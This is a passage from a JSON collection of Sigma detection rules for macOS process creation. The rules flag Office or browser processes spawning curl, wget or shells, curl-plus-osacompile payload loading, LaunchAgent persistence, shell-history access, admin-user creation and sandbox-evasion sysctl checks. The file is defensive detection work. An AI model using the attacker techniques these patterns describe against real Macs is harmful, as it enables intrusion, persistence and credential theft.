  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml",
    "content": "title: Suspicious Microsoft Office Child Process - MacOS\nid: 69483748-1525-4a6c-95ca-90dc8d431b68\nstatus: test\ndescription: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution\nreferences:\n    - https://redcanary.com/blog/applescript/\n    - https://objective-see.org/blog/blog_0x4B.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-01-31\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.t1059.002\n    - attack.t1137.002\n    - attack.t1204.002\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|contains:\n            - 'Microsoft Word'\n            - 'Microsoft Excel'\n            - 'Microsoft PowerPoint'\n            - 'Microsoft OneNote'\n        Image|endswith:\n            - '/bash'\n            - '/curl'\n            - '/dash'\n            - '/fish'\n            - '/osacompile'\n            - '/osascript'\n            - '/sh'\n            - '/zsh'\n            - '/python'\n            - '/python3'\n            - '/wget'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml",
    "content": "title: OSACompile Run-Only Execution\nid: b9d9b652-d8ed-4697-89a2-a1186ee680ac\nstatus: test\ndescription: Detects potential suspicious run-only executions compiled using OSACompile\nreferences:\n    - https://redcanary.com/blog/applescript/\n    - https://ss64.com/osx/osacompile.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-01-31\ntags:\n    - attack.t1059.002\n    - attack.execution\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'osacompile'\n            - ' -x '\n            - ' -e '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml",
    "content": "title: Payload Decoded and Decrypted via Built-in Utilities\nid: 234dc5df-40b5-49d1-bf53-0d44ce778eca\nstatus: test\ndescription: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823\nauthor: Tim Rauch (rule), Elastic (idea)\ndate: 2022-10-17\ntags:\n    - attack.t1059\n    - attack.t1204\n    - attack.execution\n    - attack.t1140\n    - attack.defense-evasion\n    - attack.s0482\n    - attack.s0402\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/openssl'\n        CommandLine|contains|all:\n            - '/Volumes/'\n            - 'enc'\n            - '-base64'\n            - ' -d '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml",
    "content": "title: Potential Persistence Via PlistBuddy\nid: 65d506d3-fcfe-4071-b4b2-bcefe721bbbb\nstatus: test\ndescription: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility\nreferences:\n    - https://redcanary.com/blog/clipping-silver-sparrows-wings/\n    - https://www.manpagez.com/man/8/PlistBuddy/\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-02-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.001\n    - attack.t1543.004\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/PlistBuddy'\n        CommandLine|contains|all:\n            - 'RunAtLoad'\n            - 'true'\n        CommandLine|contains:\n            - 'LaunchAgents'\n            - 'LaunchDaemons'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_meshagent_arguments.yml",
    "content": "title: Remote Access Tool - Potential MeshAgent Execution - MacOS\nid: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9\nrelated:\n    - id: 2fbbe9ff-0afc-470b-bdc0-592198339968\n      type: similar\nstatus: experimental\ndescription: |\n    Detects potential execution of MeshAgent which is a tool used for remote access.\n    Historical data shows that threat actors rename MeshAgent binary to evade detection.\n    Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.\nreferences:\n    - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access\n    - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\n    - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n    - https://www.security.com/threat-intelligence/medusa-ransomware-attacks\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-05-19\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        CommandLine|contains: '--meshServiceName'\n    condition: selection\nfalsepositives:\n    - Environments that legitimately use MeshAgent\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_renamed_meshagent_execution.yml",
    "content": "title: Remote Access Tool - Renamed MeshAgent Execution - MacOS\nid: bd3b5eaa-439d-4a42-8f35-a49f5c8a2582\nrelated:\n    - id: b471f462-eb0d-4832-be35-28d94bdb4780\n      type: similar\n    - id: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9\n      type: derived\nstatus: experimental\ndescription: |\n    Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.\n    RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.\n    However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.\nreferences:\n    - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access\n    - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\n    - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n    - https://www.security.com/threat-intelligence/medusa-ransomware-attacks\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-05-19\ntags:\n    - attack.command-and-control\n    - attack.defense-evasion\n    - attack.t1219.002\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_meshagent:\n        - CommandLine|contains: '--meshServiceName'\n        - OriginalFileName|contains: 'meshagent'\n    filter_main_legitimate:\n        Image|endswith:\n            - '/meshagent'\n            - '/meshagent_osx64'\n    condition: selection_meshagent and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml",
    "content": "title: Remote Access Tool - Team Viewer Session Started On MacOS Host\nid: f459ccb4-9805-41ea-b5b2-55e279e2424a\nrelated:\n    - id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357\n      type: similar\n    - id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d\n      type: similar\nstatus: test\ndescription: |\n    Detects the command line executed when TeamViewer starts a session started by a remote host.\n    Once a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\nreferences:\n    - Internal Research\nauthor: Josh Nickels, Qi Nan\ndate: 2024-03-11\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        ParentImage|endswith: '/TeamViewer_Service'\n        Image|endswith: '/TeamViewer_Desktop'\n        CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of TeamViewer\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml",
    "content": "title: Macos Remote System Discovery\nid: 10227522-8429-47e6-a301-f2b2d014e7ad\nstatus: test\ndescription: Detects the enumeration of other remote systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-22\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith: '/arp'\n        CommandLine|contains: '-a'\n    selection_2:\n        Image|endswith: '/ping'\n        CommandLine|contains:\n            - ' 10.' # 10.0.0.0/8\n            - ' 192.168.' # 192.168.0.0/16\n            - ' 172.16.' # 172.16.0.0/12\n            - ' 172.17.'\n            - ' 172.18.'\n            - ' 172.19.'\n            - ' 172.20.'\n            - ' 172.21.'\n            - ' 172.22.'\n            - ' 172.23.'\n            - ' 172.24.'\n            - ' 172.25.'\n            - ' 172.26.'\n            - ' 172.27.'\n            - ' 172.28.'\n            - ' 172.29.'\n            - ' 172.30.'\n            - ' 172.31.'\n            - ' 127.' # 127.0.0.0/8\n            - ' 169.254.' # 169.254.0.0/16\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml",
    "content": "title: Scheduled Cron Task/Job - MacOs\nid: 7c3b43d8-d794-47d2-800a-d277715aa460\nstatus: test\ndescription: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-06\nmodified: 2022-11-27\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/crontab'\n        CommandLine|contains: '/tmp/'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_screencapture.yml",
    "content": "title: Screen Capture - macOS\nid: 0877ed01-da46-4c49-8476-d49cdd80dfa7\nstatus: test\ndescription: Detects attempts to use screencapture to collect macOS screenshots\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md\n    - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py\nauthor: remotephone, oscd.community\ndate: 2020-10-13\nmodified: 2021-11-27\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image: '/usr/sbin/screencapture'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity taking screenshots\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml",
    "content": "title: Security Software Discovery - MacOs\nid: 0ed75b9c-c73b-424d-9e7d-496cd565fbe0\nstatus: test\ndescription: Detects usage of system utilities (only grep for now) to discover security software discovery\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    image:\n        Image: '/usr/bin/grep'\n    selection_cli_1:\n        CommandLine|contains:\n            - 'nessusd'        # nessus vulnerability scanner\n            - 'santad'         # google santa\n            - 'CbDefense'      # carbon black\n            - 'falcond'        # crowdstrike falcon\n            - 'td-agent'       # fluentd log shipper\n            - 'packetbeat'     # elastic network logger/shipper\n            - 'filebeat'       # elastic log file shipper\n            - 'auditbeat'      # elastic auditing agent/log shipper\n            - 'osqueryd'       # facebook osquery\n            - 'BlockBlock'     # Objective-See persistence locations watcher/blocker\n            - 'LuLu'           # Objective-See firewall management utility\n    selection_cli_2: # Objective Development Software firewall management utility\n        CommandLine|contains|all:\n            - 'Little'\n            - 'Snitch'\n    condition: image and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_space_after_filename.yml",
    "content": "title: Space After Filename - macOS\nid: b6e2a2e3-2d30-43b1-a4ea-071e36595690\nstatus: test\ndescription: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md\nauthor: remotephone\ndate: 2021-11-20\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.t1036.006\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection1:\n        CommandLine|endswith: ' '\n    selection2:\n        Image|endswith: ' '\n    condition: 1 of selection*\nfalsepositives:\n    - Mistyped commands or legitimate binaries named to match the pattern\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml",
    "content": "title: Split A File Into Pieces\nid: 7f2bb9d5-6395-4de5-969c-70c11fbe6b12\nstatus: test\ndescription: Detection use of the command \"split\" to split files into parts and possible transfer.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md\nauthor: 'Igor Fits, Mikhail Larin, oscd.community'\ndate: 2020-10-15\nmodified: 2021-11-27\ntags:\n    - attack.exfiltration\n    - attack.t1030\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/split'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml",
    "content": "title: Suspicious Browser Child Process - MacOS\nid: 0250638a-2b28-4541-86fc-ea4c558fa0c6\nstatus: test\ndescription: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.\nreferences:\n    - https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang\n    - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-04-05\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1189\n    - attack.t1203\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        ParentImage|contains:\n            - 'com.apple.WebKit.WebContent'\n            - 'firefox'\n            - 'Google Chrome Helper'\n            - 'Google Chrome'\n            - 'Microsoft Edge'\n            - 'Opera'\n            - 'Safari'\n            - 'Tor Browser'\n        Image|endswith:\n            - '/bash'\n            - '/curl'\n            - '/dash'\n            - '/ksh'\n            - '/osascript'\n            - '/perl'\n            - '/php'\n            - '/pwsh'\n            - '/python'\n            - '/sh'\n            - '/tcsh'\n            - '/wget'\n            - '/zsh'\n    filter_main_generic:\n        CommandLine|contains: '--defaults-torrc' # Informs tor to use default config file\n    filter_main_ms_autoupdate:\n        CommandLine|contains: '/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate' # Microsoft AutoUpdate utility\n    filter_main_chrome:\n        ParentImage|contains:\n            - 'Google Chrome Helper'\n            - 'Google Chrome'\n        CommandLine|contains:\n            - '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/*/Resources/install.sh' # Install the Google Chrome browser\n            - '/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/*/Resources/keystone_promote_preflight.sh' # Updates the Google Chrome branding configuration files\n            - '/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/*/Resources/keystone_promote_postflight.sh' # Script that performs the post-installation tasks\n    filter_main_ms_edge:\n        ParentImage|contains: 'Microsoft Edge'\n        CommandLine|contains:\n            - 'IOPlatformExpertDevice' # Retrieves the IOPlatformUUID (parent process - Microsoft Edge)\n            - 'hw.model' # Retrieves model name of the computer's hardware (parent process - Microsoft Edge)\n    filter_main_chromerecovery:\n        ParentImage|contains:\n            - 'Google Chrome Helper'\n            - 'Google Chrome'\n        CommandLine|contains|all:\n            - '/Users/'\n            - '/Library/Application Support/Google/Chrome/recovery/'\n            - '/ChromeRecovery'\n    filter_optional_null:\n        # Aoids alerting for the events which do not have command-line arguments\n        CommandLine: null\n    filter_optional_empty:\n        # Aoids alerting for the events which do not have command-line arguments\n        CommandLine: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate browser install, update and recovery scripts\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml",
    "content": "title: Suspicious Execution via macOS Script Editor\nid: 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4\nstatus: test\ndescription: Detects when the macOS Script Editor utility spawns an unusual child process.\nauthor: Tim Rauch (rule), Elastic (idea)\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685\n    - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\ndate: 2022-10-21\nmodified: 2022-12-28\nlogsource:\n    category: process_creation\n    product: macos\ntags:\n    - attack.t1566\n    - attack.t1566.002\n    - attack.initial-access\n    - attack.t1059\n    - attack.t1059.002\n    - attack.t1204\n    - attack.t1204.001\n    - attack.execution\n    - attack.persistence\n    - attack.t1553\n    - attack.defense-evasion\ndetection:\n    selection_parent:\n        ParentImage|endswith: '/Script Editor'\n    selection_img:\n        - Image|endswith:\n              - '/curl'\n              - '/bash'\n              - '/sh'\n              - '/zsh'\n              - '/dash'\n              - '/fish'\n              - '/osascript'\n              - '/mktemp'\n              - '/chmod'\n              - '/php'\n              - '/nohup'\n              - '/openssl'\n              - '/plutil'\n              - '/PlistBuddy'\n              - '/xattr'\n              - '/sqlite'\n              - '/funzip'\n              - '/popen'\n        - Image|contains:\n              - 'python'\n              - 'perl'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml",
    "content": "title: Potential Discovery Activity Using Find - MacOS\nid: 85de3a19-b675-4a51-bfc6-b11a5186c971\nrelated:\n    - id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf\n      type: similar\nstatus: test\ndescription: Detects usage of \"find\" binary in a suspicious manner to perform discovery\nreferences:\n    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/find'\n        CommandLine|contains:\n            - '-perm -4000'\n            - '-perm -2000'\n            - '-perm 0777'\n            - '-perm -222'\n            - '-perm -o w'\n            - '-perm -o x'\n            - '-perm -u=s'\n            - '-perm -g=s'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml",
    "content": "title: Suspicious History File Operations\nid: 508a9374-ad52-4789-b568-fc358def2c65\nstatus: test\ndescription: Detects commandline operations on shell history files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nauthor: 'Mikhail Larin, oscd.community'\ndate: 2020-10-17\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1552.003\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '.bash_history'\n            - '.zsh_history'\n            - '.zhistory'\n            - '.history'\n            - '.sh_history'\n            - 'fish_history'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\n    - Legitimate software, cleaning hist file\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml",
    "content": "title: Potential In-Memory Download And Compile Of Payloads\nid: 13db8d2e-7723-4c2c-93c1-a4d36994f7ef\nstatus: test\ndescription: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware\nreferences:\n    - https://redcanary.com/blog/mac-application-bundles/\nauthor: Sohan G (D4rkCiph3r), Red Canary (idea)\ndate: 2023-08-22\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1059.007\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'osacompile'\n            - 'curl'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml",
    "content": "title: Suspicious MacOS Firmware Activity\nid: 7ed2c9f7-c59d-4c82-a7e2-f859aa676099\nstatus: test\ndescription: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.\nreferences:\n    - https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml\n    - https://www.manpagez.com/man/8/firmwarepasswd/\n    - https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web\nauthor: Austin Songer @austinsonger\ndate: 2021-09-30\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection1:\n        Image: '/usr/sbin/firmwarepasswd'\n        CommandLine|contains:\n            - 'setpasswd'\n            - 'full'\n            - 'delete'\n            - 'check'\n    condition: selection1\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml",
    "content": "title: System Network Discovery - macOS\nid: 58800443-f9fc-4d55-ae0c-98a3966dfb97\nstatus: test\ndescription: Detects enumeration of local network configuration\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md\nauthor: remotephone, oscd.community\ndate: 2020-10-06\nmodified: 2024-08-29\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_1:\n        Image|endswith:\n            - '/arp'\n            - '/ifconfig'\n            - '/netstat'\n            - '/networksetup'\n            - '/socketfilterfw'\n    selection_2:\n        Image: '/usr/bin/defaults'\n        CommandLine|contains|all:\n            - '/Library/Preferences/com.apple.alf'\n            - 'read'\n    filter_main_wifivelocityd:\n        ParentImage|endswith: '/wifivelocityd'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml",
    "content": "title: Osacompile Execution By Potentially Suspicious Applet/Osascript\nid: a753a6af-3126-426d-8bd0-26ebbcb92254\nstatus: test\ndescription: Detects potential suspicious applet or osascript executing \"osacompile\".\nreferences:\n    - https://redcanary.com/blog/mac-application-bundles/\nauthor: Sohan G (D4rkCiph3r), Red Canary (Idea)\ndate: 2023-04-03\ntags:\n    - attack.execution\n    - attack.t1059.002\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '/applet'\n            - '/osascript'\n        CommandLine|contains: 'osacompile'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml",
    "content": "title: System Information Discovery Using sw_vers\nid: 5de06a6f-673a-4fc0-8d48-bcfe3837b033\nstatus: test\ndescription: Detects the use of \"sw_vers\" for system information discovery\nreferences:\n    - https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior\n    - https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior\n    - https://ss64.com/osx/sw_vers.html\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-12-20\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # VT Query: 'behavior_processes:\"sw_vers\" and (behavior_processes:\"-productVersion\" or behavior_processes:\"-productName\" or behavior_processes:\"-buildVersion\") tag:dmg p:5+'\n    selection_image:\n        Image|endswith: '/sw_vers'\n    selection_options:\n        CommandLine|contains:\n            - '-buildVersion'\n            - '-productName'\n            - '-productVersion'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml",
    "content": "title: User Added To Admin Group Via Sysadminctl\nid: 652c098d-dc11-4ba6-8566-c20e89042f2b\nrelated:\n    - id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b\n      type: obsolete\nstatus: test\ndescription: Detects attempts to create and add an account to the admin group via \"sysadminctl\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos\n    - https://ss64.com/osx/sysadminctl.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-03-19\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078.003\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        # Creates and adds new user to admin group\n        Image|endswith: '/sysadminctl'\n        CommandLine|contains|all:\n            - ' -addUser '\n            - ' -admin '\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml",
    "content": "title: Guest Account Enabled Via Sysadminctl\nid: d7329412-13bd-44ba-a072-3387f804a106\nstatus: test\ndescription: Detects attempts to enable the guest account using the sysadminctl utility\nreferences:\n    - https://ss64.com/osx/sysadminctl.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023-02-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\n    - attack.t1078.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/sysadminctl'\n        CommandLine|contains|all:\n            # By default the guest account is not active\n            - ' -guestAccount'\n            - ' on'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_sysctl_discovery.yml",
    "content": "title: System Information Discovery Via Sysctl - MacOS\nid: 6ff08e55-ea53-4f27-94a1-eff92e6d9d5c\nstatus: test\ndescription: |\n    Detects the execution of \"sysctl\" with specific arguments that have been used by threat actors and malware. It provides system hardware information.\n    This process is primarily used to detect and avoid virtualization and analysis environments.\nreferences:\n    - https://www.loobins.io/binaries/sysctl/#\n    - https://evasions.checkpoint.com/techniques/macos.html\n    - https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/\n    - https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/\n    - https://objective-see.org/blog/blog_0x1E.html\n    - https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior\n    - https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior\nauthor: Pratinav Chandra\ndate: 2024-05-27\ntags:\n    - attack.defense-evasion\n    - attack.t1497.001\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '/sysctl'\n        - CommandLine|contains: 'sysctl'\n    selection_cmd:\n        CommandLine|contains:\n            - 'hw.'\n            - 'kern.'\n            - 'machdep.'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml",
    "content": "title: System Network Connections Discovery - MacOs\nid: 9a7a0393-2144-4626-9bf1-7c2f5a7321db\nstatus: test\ndescription: Detects usage of system utilities to discover system network connections\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-12-28\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith:\n            - '/who'\n            - '/w'\n            - '/last'\n            - '/lsof'\n            - '/netstat'\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml",
